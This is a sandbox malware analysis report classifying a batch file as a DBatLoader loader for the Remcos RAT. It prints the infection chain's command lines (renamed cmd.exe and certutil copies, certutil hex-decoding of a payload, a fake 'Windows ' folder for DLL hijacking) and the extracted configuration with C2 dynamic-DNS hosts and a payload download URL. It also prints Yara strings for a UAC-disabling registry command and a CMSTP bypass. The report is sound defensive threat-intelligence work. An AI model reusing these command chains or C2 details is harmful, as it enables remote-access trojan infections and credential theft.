Edit tour

Windows Analysis Report
saw.bat

Overview

General Information

Sample name:	saw.bat
Analysis ID:	1565803
MD5:	0be98dc322d842f3f9952ca41c2fe012
SHA1:	a0d32141b0c3bb39ce4f4e6a8d4fb0699341d4e3
SHA256:	a1a77d48d276da51e97ce070b0d4c08c6f2900e8a2d4c15ce0adb4cff27c2669
Tags:	batWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates a thread in another existing process (thread injection)

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found large BAT file

Injects a PE file into a foreign processes

Opens the same file many times (likely Sandbox evasion)

Registers a new ROOT certificate

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Creation with Colorcpl

Sigma detected: Suspicious Program Location with Network Connections

Uses dynamic DNS services

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 6784 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)

alpha.exe (PID: 6828 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

extrac32.exe (PID: 6876 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)

alpha.exe (PID: 6972 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

kn.exe (PID: 6964 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.exe (PID: 7068 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

kn.exe (PID: 7080 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)

AnyDesk.PIF (PID: 3288 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)

cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 7112 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 6780 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

alpha.pif (PID: 6880 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 648 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 7032 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xpha.pif (PID: 4924 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)

alpha.pif (PID: 6972 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 6476 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 5232 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

esentutl.exe (PID: 6476 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

colorcpl.exe (PID: 7088 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

alpha.exe (PID: 3732 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

alpha.exe (PID: 2200 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Puyiaiob.PIF (PID: 5024 cmdline: "C:\Users\Public\Libraries\Puyiaiob.PIF" MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)

SndVol.exe (PID: 3848 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)

Puyiaiob.PIF (PID: 1700 cmdline: "C:\Users\Public\Libraries\Puyiaiob.PIF" MD5: 35811E8D8969BEF5354C7C3E6DBEFB27)

colorcpl.exe (PID: 1432 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv"]}

Threatname: Remcos

{"Host:Port:Password": ["tre1ms.freeddns.org:2404:1", "freshmysweeterbk.ddns.net:2404:1", "mysweeterbk.ddns.net:2404:1", "bbhmeetre1ms.freeddns.org:2404:1", "myumysmeetr.ddns.net:2404:1", "meetre1ms.freeddns.org:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B5YX7T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "ANYDESKS"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\ANYDESKS\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c3ef:$a1: Remcos restarted by watchdog! 0x6c967:$a3: %02i:%02i:%02i:%03i
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x66443:$str_a1: C:\Windows\System32\cmd.exe 0x663bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x663bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x668bf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x670ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x664b3:$str_b2: Executing file: 0x67533:$str_b3: GetDirectListeningPort 0x66edf:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6705f:$str_b7: \update.vbs 0x664db:$str_b9: Downloaded file: 0x664c7:$str_b10: Downloading file: 0x6656b:$str_b12: Failed to upload file: 0x674fb:$str_b13: StartForward 0x6751b:$str_b14: StopForward 0x66fb7:$str_b15: fso.DeleteFile " 0x66f4b:$str_b16: On Error Resume Next 0x66fe7:$str_b17: fso.DeleteFolder " 0x6655b:$str_b18: Uploaded file: 0x6651b:$str_b19: Unable to delete: 0x66f7f:$str_b20: while fso.FileExists(" 0x669f8:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6632f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x662c3:$s1: CoGetObject 0x662d7:$s1: CoGetObject 0x662f3:$s1: CoGetObject 0x70295:$s1: CoGetObject 0x66283:$s2: Elevation:Administrator!new:
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c3ef:$a1: Remcos restarted by watchdog! 0x6c967:$a3: %02i:%02i:%02i:%03i
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x66443:$str_a1: C:\Windows\System32\cmd.exe 0x663bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x663bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x668bf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x670ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x664b3:$str_b2: Executing file: 0x67533:$str_b3: GetDirectListeningPort 0x66edf:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6705f:$str_b7: \update.vbs 0x664db:$str_b9: Downloaded file: 0x664c7:$str_b10: Downloading file: 0x6656b:$str_b12: Failed to upload file: 0x674fb:$str_b13: StartForward 0x6751b:$str_b14: StopForward 0x66fb7:$str_b15: fso.DeleteFile " 0x66f4b:$str_b16: On Error Resume Next 0x66fe7:$str_b17: fso.DeleteFolder " 0x6655b:$str_b18: Uploaded file: 0x6651b:$str_b19: Unable to delete: 0x66f7f:$str_b20: while fso.FileExists(" 0x669f8:$str_c0: [Firefox StoredLogins not found]
0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6632f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x662c3:$s1: CoGetObject 0x662d7:$s1: CoGetObject 0x662f3:$s1: CoGetObject 0x70295:$s1: CoGetObject 0x66283:$s2: Elevation:Administrator!new:
0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
Process Memory Space: AnyDesk.PIF PID: 3288	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: colorcpl.exe PID: 7088	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: colorcpl.exe PID: 7088	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: colorcpl.exe PID: 7088	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: colorcpl.exe PID: 7088	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xc808:$a1: Remcos restarted by watchdog! 0x1c96b:$a1: Remcos restarted by watchdog! 0xcd62:$a3: %02i:%02i:%02i:%03i 0xd191:$a3: %02i:%02i:%02i:%03i 0x1cec5:$a3: %02i:%02i:%02i:%03i 0x1d2f4:$a3: %02i:%02i:%02i:%03i
Process Memory Space: SndVol.exe PID: 3848	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: SndVol.exe PID: 3848	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: SndVol.exe PID: 3848	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: SndVol.exe PID: 3848	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf5fd:$a1: Remcos restarted by watchdog! 0x215f2:$a1: Remcos restarted by watchdog! 0xfb57:$a3: %02i:%02i:%02i:%03i 0xff86:$a3: %02i:%02i:%02i:%03i 0x21b4c:$a3: %02i:%02i:%02i:%03i 0x21f7b:$a3: %02i:%02i:%02i:%03i
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
30.2.SndVol.exe.4a70000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.4a70000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.4a70000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.4a70000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c3ef:$a1: Remcos restarted by watchdog! 0x6c967:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.4a70000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x66443:$str_a1: C:\Windows\System32\cmd.exe 0x663bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x663bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x668bf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x670ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x664b3:$str_b2: Executing file: 0x67533:$str_b3: GetDirectListeningPort 0x66edf:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6705f:$str_b7: \update.vbs 0x664db:$str_b9: Downloaded file: 0x664c7:$str_b10: Downloading file: 0x6656b:$str_b12: Failed to upload file: 0x674fb:$str_b13: StartForward 0x6751b:$str_b14: StopForward 0x66fb7:$str_b15: fso.DeleteFile " 0x66f4b:$str_b16: On Error Resume Next 0x66fe7:$str_b17: fso.DeleteFolder " 0x6655b:$str_b18: Uploaded file: 0x6651b:$str_b19: Unable to delete: 0x66f7f:$str_b20: while fso.FileExists(" 0x669f8:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.4a70000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6632f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x662c3:$s1: CoGetObject 0x662d7:$s1: CoGetObject 0x662f3:$s1: CoGetObject 0x70295:$s1: CoGetObject 0x66283:$s2: Elevation:Administrator!new:
19.2.colorcpl.exe.6f40000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.6f40000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.6f40000.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.6f40000.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b7ef:$a1: Remcos restarted by watchdog! 0x6bd67:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.6f40000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x65843:$str_a1: C:\Windows\System32\cmd.exe 0x657bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x657bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65cbf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x664ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x658b3:$str_b2: Executing file: 0x66933:$str_b3: GetDirectListeningPort 0x662df:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6645f:$str_b7: \update.vbs 0x658db:$str_b9: Downloaded file: 0x658c7:$str_b10: Downloading file: 0x6596b:$str_b12: Failed to upload file: 0x668fb:$str_b13: StartForward 0x6691b:$str_b14: StopForward 0x663b7:$str_b15: fso.DeleteFile " 0x6634b:$str_b16: On Error Resume Next 0x663e7:$str_b17: fso.DeleteFolder " 0x6595b:$str_b18: Uploaded file: 0x6591b:$str_b19: Unable to delete: 0x6637f:$str_b20: while fso.FileExists(" 0x65df8:$str_c0: [Firefox StoredLogins not found]
